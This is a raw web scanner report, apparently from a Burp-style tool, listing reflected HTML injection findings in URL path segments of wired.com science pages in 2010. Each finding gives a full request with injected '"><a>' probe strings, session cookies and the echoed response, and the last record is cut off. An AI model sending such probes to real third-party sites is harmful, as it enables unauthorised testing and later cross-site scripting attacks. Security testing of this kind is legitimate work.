The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c5e"><a>b29ca90e37a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news59c5e"><a>b29ca90e37a/2008/02/dayintech_0226 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:37 GMT Date: Sun, 21 Nov 2010 23:12:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news59c5e"><a>b29ca90e37a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cda9"><a>f470b0d8cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science4cda9"><a>f470b0d8cd7/discoveries/news/2008/03/dayintech_0321 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:15 GMT Date: Sun, 21 Nov 2010 23:12:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science4cda9"><a>f470b0d8cd7 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5b1"><a>73c8031883a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesff5b1"><a>73c8031883a/news/2008/03/dayintech_0321 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:34 GMT Date: Sun, 21 Nov 2010 23:12:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesff5b1"><a>73c8031883a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69c62"><a>a1fbb2dbf1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news69c62"><a>a1fbb2dbf1f/2008/03/dayintech_0321 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:45 GMT Date: Sun, 21 Nov 2010 23:12:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news69c62"><a>a1fbb2dbf1f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71a7"><a>db01b03a6b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencea71a7"><a>db01b03a6b2/discoveries/news/2008/05/dayintech_0505 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:22 GMT Date: Sun, 21 Nov 2010 23:11:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencea71a7"><a>db01b03a6b2 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e4ac"><a>5182a879937 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries5e4ac"><a>5182a879937/news/2008/05/dayintech_0505 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:37 GMT Date: Sun, 21 Nov 2010 23:11:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries5e4ac"><a>5182a879937 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05d8"><a>5b5e97a1820 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb05d8"><a>5b5e97a1820/2008/05/dayintech_0505 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:47 GMT Date: Sun, 21 Nov 2010 23:11:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb05d8"><a>5b5e97a1820"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ff3"><a>453721659f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science10ff3"><a>453721659f6/discoveries/news/2008/05/dayintech_0507 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:27 GMT Date: Sun, 21 Nov 2010 23:11:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science10ff3"><a>453721659f6 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d1cb"><a>508326e35f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries4d1cb"><a>508326e35f3/news/2008/05/dayintech_0507 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:42 GMT Date: Sun, 21 Nov 2010 23:11:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries4d1cb"><a>508326e35f3 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc419"><a>7899aecd94e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newscc419"><a>7899aecd94e/2008/05/dayintech_0507 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:53 GMT Date: Sun, 21 Nov 2010 23:11:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newscc419"><a>7899aecd94e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7763"><a>37b818daaa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencef7763"><a>37b818daaa2/discoveries/news/2008/05/dayintech_0508 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencef7763"><a>37b818daaa2 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1784"><a>144b05b950e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesa1784"><a>144b05b950e/news/2008/05/dayintech_0508 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:38 GMT Date: Sun, 21 Nov 2010 23:11:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesa1784"><a>144b05b950e c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a08c"><a>d3d8da4d6ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news4a08c"><a>d3d8da4d6ca/2008/05/dayintech_0508 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:50 GMT Date: Sun, 21 Nov 2010 23:11:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news4a08c"><a>d3d8da4d6ca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac1f"><a>5403a7340a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceaac1f"><a>5403a7340a/discoveries/news/2008/05/dayintech_0529 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:26 GMT Date: Sun, 21 Nov 2010 23:11:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceaac1f"><a>5403a7340a ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d1a4"><a>42968683ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries9d1a4"><a>42968683ca3/news/2008/05/dayintech_0529 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:41 GMT Date: Sun, 21 Nov 2010 23:11:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries9d1a4"><a>42968683ca3 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b14"><a>883fb4baad9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news10b14"><a>883fb4baad9/2008/05/dayintech_0529 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:53 GMT Date: Sun, 21 Nov 2010 23:11:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news10b14"><a>883fb4baad9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df74"><a>5147fa5c783 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science4df74"><a>5147fa5c783/discoveries/news/2008/07/dayintech_0703 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:55 GMT Date: Sun, 21 Nov 2010 23:11:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science4df74"><a>5147fa5c783 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b3d"><a>3ce8d2bac62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesb3b3d"><a>3ce8d2bac62/news/2008/07/dayintech_0703 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
